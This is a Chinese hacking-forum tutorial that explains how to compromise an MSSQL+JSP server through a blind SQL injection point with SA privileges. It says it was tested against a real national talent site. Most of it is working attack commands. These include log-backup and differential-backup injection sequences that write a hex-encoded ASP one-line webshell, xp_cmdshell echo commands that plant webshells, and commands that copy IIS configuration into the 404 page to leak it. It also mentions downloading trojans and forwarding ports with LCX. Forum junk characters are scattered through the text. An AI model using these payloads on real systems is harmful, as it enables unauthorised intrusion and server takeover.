sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
; `3 f- h0 l5 K% c+ y: R
# Q. p/ b2 I* k, K
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
) S3 M" a" q3 ?( N
                                                                 
                                                                 
                                                                  论坛： http://www.90team.net/
5 L) g* }' }: Y- i
2 J$ e6 G. i$ S) B3 e2 _7 i! t8 l: d% W

" t6 Q) k- [- c4 T, O友情检测国家人才网


内容：MSSQL注入SA权限不显错模式下的入侵


一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
' M$ L1 K1 O5 r$ U
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
; p+ q* g: \# ~- s! }) m1 ?

这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

思路：

首先：
* e8 z8 [; v# W" h, [
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

" s( ?1 t! B5 ^, l+ i6 n- [2 @3 ~1.日志备份获得Webshell
" S$ `. c8 [! R, |) [$ G
/ V& _0 F5 ~$ \1 {1 q0 i2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。
: k) n) @* a7 A4 Y# ^
( ^! x9 b! ?5 j1 h* R/ |2 t5.直接下载LCX将服务器端口转发出来
& G$ a' g( o9 q
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。



在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
9 \3 d3 c+ [% {
我直接演示后面一个方法
+ e: c, f; P+ o+ w# L

分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL


  \. `$ o4 d, N4 t- z
+ w- f, `& i. C6 e3 h- v6 e
. f- ^: I3 h! w* [# C- M! C, f- Q◆日志备份：

& `- o1 G% ?+ U* \' a  a! o% I; ]- T
1. 进行初始备份
, r; |2 Y/ h& Y& t; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
+ N3 ]$ |* m( z/ o% {! [- M) k1 }0 i
2. 插入数据
: L) n/ A4 N# c7 O;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
1 q! N' w( q; {7 p3 W
$ x0 N$ k4 i# o0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
% b3 C) b) d% R

9 n% {6 L5 V4 W0 H
◆数据库差异备份

2 `, u  i# T2 a) x& P0 J（1. 进行差异备份准备工作
6 x/ i7 V4 J) Q( B5 {& Q% I9 H" R
  P5 H3 e1 x" ]7 M! B;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
/ t; V9 `3 s. s
7 Y7 R6 V  D; M上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
! `0 }8 K4 p, c7 t- E
% \+ O! I, x  y% t
（2. 将数据写入到数据库
( d* S1 X- y; ?2 t' b: C1 N;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
5 c( e( t/ {# O3 Y" {) [4 ~6 B9 g
8 m1 _, W) c1 u! l0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

! Z' h6 Z0 {6 D; W9 u# [3 L3. 备份数据库并清理临时文件
4 X  l4 Y$ H+ s1 v. D! w2 e
# ^9 M6 Q) V/ E;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

0x633A5C746573742E617370  为 c:\test.asp  删除临时文件


$ m- b; x5 \- R7 j( Q4 s, |& S. G
0 c4 V4 z7 i2 ?  }- w; R8 G用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
' p7 a/ X, v, Y: [- Z& ^
- Q- x. X5 j/ k( B; W2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径
7 t' I9 `. g$ |6 ^" y! y
( d0 I5 }5 H! W6 \, s* @/ ~$ p     
/ r4 x2 z, Q% C2 f; I- u# [     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
/ b6 x+ `$ g: |
3 R; ]* t$ ^1 f; p: @执行命令
! v' Q# O, K- J& `     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

$ V; t& ~7 Y; m6 R7 u; J$ t4 |
: f) ?9 x& [2 E5 V. t, R

& R; S6 w, x9 ]9 X( W; E6 l
0 x" ~  e) G8 {3 w* }  v


; d3 s2 ?' E. ?% i+ C/ G
; H2 C/ l1 l1 ]% Q3 e. A3 m


% c5 n% j9 R6 p; `3 X# z7 w

( G9 [8 u* q$ M
! |7 x  z, L/ k. J6 q
$ K  u% i. S9 X& F2 T
6 t7 o: i0 k* I' _& h

4 U6 k0 L! g  r

+ z, r8 b9 |+ K2 Q
& g( d' o# L+ E: ?8 {1 f( ^

- J, N( P" W+ d8 \

4 M" S* ~0 c& j- w" N6 p( ]4 E. l0 T
; ^( D! l6 f% L! X8 j
4 {2 ~2 e# a5 K3 R7 |# L



5 W: B- S/ L% O, p/ Y4 r" n" n( z
5 j7 Y5 q& G5 V( {2 R4 S* {


- d7 D) B# [) M) w- n6 {/ K3 ~



* {. Z4 Z$ {; }8 d7 M9 L" w' v
6 `8 P& X* {* d; T7 s

! r  s7 j9 \, N9 Y" J! G
3 T4 N% ~4 X& @4 c1 V

9 s! i/ {: G: F! F- D
5 |3 d7 P: Y( A9 ^
: f0 Q4 H9 R6 ^& P